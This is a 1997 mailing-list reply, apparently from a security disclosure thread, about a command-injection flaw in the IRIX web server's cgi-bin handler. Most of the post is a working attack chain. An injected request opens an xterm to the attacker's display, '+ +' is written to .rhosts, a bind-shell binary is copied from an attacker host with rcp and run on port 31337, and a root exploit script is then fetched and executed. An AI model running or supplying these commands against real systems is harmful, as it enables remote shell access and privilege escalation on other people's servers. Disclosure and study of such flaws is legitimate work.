Re: CPSR 7: IRIX WWW Server

Aaron Bornstein (aaronb@j51.com)
Thu, 24 Jul 1997 12:59:54 -0400

On Thu, 24 Jul 1997, Thomas Walter wrote:

[snip]
> enemy% telnet victim 80
> Trying 1.2.3.4...
> Connected to victim.
> Escape character is '^]'.
> GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e
> /bin/csh|?data=Download
> UX:sh (sh): ERROR: Connection closed by foreign host.
> enemy%
>
> And voila! - What else do you want? Any other programs to start? Just
> try...
>

Keep in mind that it isn't necessary to get everything done in one
command. A string of two or three commands might sometimes be necessary
to get things moving. For example:
enemy% whoami
evil_cracker
enemy% echo + + > .rhosts
enemy% nc victim.com 80
GET /cgi-bin/handler/;/usr/bsd/rcp evil_cracker@enemy.com:portshell /tmp|?data=Download
enemy% nc victim.com 80
GET /cgi-bin/handler/;/tmp/portshell 31337|?data=Download
enemy% nc victim.com 31337
% whoami
nobody
% rcp evil_cracker@enemy.com:irix_root_bug_of_the_week.sh \
./irbotw.sh ; ./irbotw.sh
#
[... or whatever ...]

"portshell" being a program that bound itself to a TCP port and executed a
shell upon receiving a connection. Boom, shell access obtained under
whatever uid httpd is running as. Or, one could even create a dummy
inetd.conf and run their own copy of inetd. The possiblities are
virtually limitless.

--Aaron

- -- --- ---- - Aaron Bornstein : aaronb at j51 dot com - ---- --- -- -
Never let your schooling interfere with your education